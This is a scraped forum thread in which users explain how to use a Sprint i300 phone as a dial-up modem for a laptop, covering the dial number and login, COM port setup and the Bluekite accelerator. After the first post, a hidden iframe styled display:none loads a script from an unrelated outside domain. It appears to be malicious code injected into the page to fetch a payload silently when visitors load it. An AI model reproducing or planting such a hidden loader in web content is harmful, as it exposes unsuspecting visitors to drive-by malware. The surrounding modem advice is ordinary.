+ Reply to Thread

Can I use Sprint as my ISP when using i300 as a modem?

I swear someone responded to a message of mine about how to use the i300 as a modem and posted information on a special number to call and a special password to use in order to use Sprint as your ISP when connecting your i300 to a laptop as a modem.

I *FINALLY* got my USB->COM adapter working. Took me like 2 days. (Hint: manually install COM port, THEN install adapter drivers)

But now I don't know what number to dial. I swear it was like #2002 and username web pw web or something like that. I'm assuming you don't need to use the dialer software (which I hate) and just use the regular conneciton manager to dial the special number and use the web account.

But it looks like my message was deleted--doesn't come up in any searches.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The number is #2932 and the username and password are both "web". Standard Windows dialup software works fine.
    This information is the same information the I300 uses to connect to Sprint (so it is always available on your phone if you forget it).

Cool thanks. Works like a charm.

Is there a reason to use the dialer? From reading the docs it appears there is an "Enhanced Internet" mode which is faster than straight dialup? How is this possible? Compressed packets or something? Or is it not true?

Administrator

Arrow

http://www.sphi300.com/showthread.ph...light=bluekite

visit that thread on a little info.

bluekite is the service. it basically acts like a proxy server that encodes the site you go to for a little faster download speed. i can tell the difference when using my laptop with it.

Using the I300 as a Modem

So I went travelling with my laptop and my I300. I expected my hotel to have Internet connection, but was shocked that it didn't. I am so used to cable modem. Anyway, even though my laptop has a modem, I do not have an ISP. Is it possible for the I300 to use the Sprint network as an ISP for my laptop? If so what do I have to do? Can I get it to work with IR? If I need a USB/serial cable, where do I get it?

Thanks.

Steve

Lightbulb

Go to the Sprint PCS website and download the lastest dialer software. You can use the cradle as the link from your phone to your computer so additional hardware is not needed. Once you download the software, then follow the intructions to install the Dialer and Bluekite software. Remember, normal speeds for a dial-up service is at 56k and using your I300 as an ISP is at speeds at 14.4k so it will be very slow. But, if you upgrade to the new I330 and use the new Vision network, speeds can reach up to 300k...almost as quick as DSL. Downside, using your cell as a ISP will take away from your minutes. Good luck!

question

can i300 be used as a wireless modem to work with a laptop.
    example.. the other day my roommate's on the phone and i had to use my computer but couldnt... any help would be appreciated
    thank

Re: question

Originally posted by NOMI
    can i300 be used as a wireless modem to work with a laptop.
    example.. the other day my roommate's on the phone and i had to use my computer but couldnt... any help would be appreciated
    thank
    Yes, you can use your I300 as a wireless modem. Manually add a standard 14.4 modem through the "add new hardware" icon in control panel, tell it which COM port to use (COM1 in my case), and connect your I300 to that COM port using either the data cable or the cradle. Create a standard Windows dialup connection with #2932 as the number to call and "web" as both the username and password and you should be all set. Make sure Hotsync is disabled as well.